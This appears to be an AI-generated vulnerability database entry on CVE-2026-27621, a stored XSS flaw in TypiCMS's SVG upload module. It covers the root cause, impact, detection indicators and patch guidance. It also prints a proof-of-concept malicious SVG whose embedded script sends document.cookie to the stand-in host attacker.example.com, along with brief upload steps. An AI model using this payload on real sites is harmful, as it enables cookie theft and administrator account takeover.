
Cloud Vulnerability DB
A community-led vulnerabilities database
CVE-2026-27621 is a Stored Cross-Site Scripting (XSS) vulnerability in the file upload module of TypiCMS, a multilingual CMS built on the Laravel framework. The flaw exists because SVG files are permitted for upload with only MIME type validation, while the SVG content itself is not sanitized before being stored and served. It affects all TypiCMS Core versions prior to 12.0.5, 13.0.0–13.0.8, 14.0.0–14.0.26, 15.0.0–15.0.28, and 16.0.0–16.1.6. The vulnerability was published on February 21, 2026, and carries a CVSS v3.1 score of 5.4 (Medium) and a CVSS v4.0 score of 6.8 (Medium) (Github Advisory, TypiCMS Advisory).
The root cause is CWE-79 (Improper Neutralization of Input During Web Page Generation), stemming from two flaws in TypiCMS\Modules\Core\Http\Requests\FileFormRequest.php and TypiCMS\Modules\Core\Services\FileUploader.php: SVG is explicitly whitelisted as an allowed MIME type, and the FileUploader service stores the SVG file without parsing or stripping dangerous elements such as <script> tags, <foreignObject>, <style>, or on* event handlers. An additional bug in the SVG parsing logic causes a 500 error when the uploaded SVG lacks a viewBox attribute, but this is trivially bypassed by including a valid viewBox in the malicious payload. When the default filesystem disk is set to public, the uploaded SVG is stored in a publicly accessible directory and can be triggered via a direct URL, requiring only that a victim (e.g., an administrator) visit the link (TypiCMS Advisory, Patch Commit).
Successful exploitation allows an attacker to execute arbitrary JavaScript in the browser of any user who accesses the malicious SVG file, including administrators. Even if session cookies are protected by the HttpOnly flag, the attacker's script can perform authenticated API requests on behalf of the victim — enabling account takeover through action forgery (e.g., creating new admin accounts, changing credentials, deleting content), sensitive data exfiltration (user lists, application settings), UI manipulation for phishing, and keystroke logging. The practical result is full application compromise for any privileged user who views the file (TypiCMS Advisory, Github Advisory).
A proof-of-concept (PoC) exploit is publicly available in the GitHub security advisory, demonstrating the attack with a crafted SVG file containing an embedded <script> tag (TypiCMS Advisory). Exploitation requires low privileges (file upload permission) and user interaction from a victim. There is no evidence of in-the-wild exploitation at this time, and the vulnerability is not listed in the CISA KEV catalog. The EPSS score is approximately 0.044% (12th percentile), indicating a low near-term exploitation probability (Github Advisory).
malicious.svg with embedded JavaScript and a viewBox attribute to bypass the parsing bug:<svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 100 100">
<script>
fetch('https://attacker.example.com/steal?c=' + document.cookie);
// Or perform admin actions via authenticated XHR requests
</script>
</svg>/admin/files and upload malicious.svg. The application accepts it due to permissive MIME type validation without content sanitization.http://<target>/storage/files/malicious.svg./admin/users, /admin/settings) originating from an admin session without corresponding user activity.storage/files/) containing <script> tags, on* event attributes, or <foreignObject> elements; SVG files with viewBox attributes combined with embedded JavaScript./admin/files for SVG file uploads followed by accesses to the stored SVG URL from different IP addresses or user agents; application logs recording unexpected admin-level actions (user creation, password changes) not initiated through the normal UI flow.Upgrade TypiCMS Core to the patched versions: 12.0.5, 13.0.9, 14.0.27, 15.0.29, or 16.1.7 (for the 16.x branch). The fix introduces SVG content sanitization using the enshrined/svg-sanitize library in FileUploader.php, stripping dangerous elements before the file is stored (Patch Commit). If upgrading immediately is not possible, disable SVG uploads by removing svg from the allowed MIME types in FileFormRequest.php. Additional hardening measures include implementing a strict Content-Security-Policy (CSP) header to block inline script execution, and serving user-uploaded files from a separate cookie-less domain to isolate user-generated content from the main application (TypiCMS Advisory).
The vulnerability was reported by researcher lukasz-rybak and published by maintainer sdebacker on February 21, 2026. No significant broader media coverage or notable community commentary beyond the GitHub advisory has been identified at this time (TypiCMS Advisory).
Source: This report was generated using AI
Free Vulnerability Assessment
Evaluate your cloud security practices across 9 security domains to benchmark your risk level and identify gaps in your defenses.
Get a personalized demo
"Best User Experience I have ever seen, provides full visibility to cloud workloads."
"Wiz provides a single pane of glass to see what is going on in our cloud environments."
"We know that if Wiz identifies something as critical, it actually is."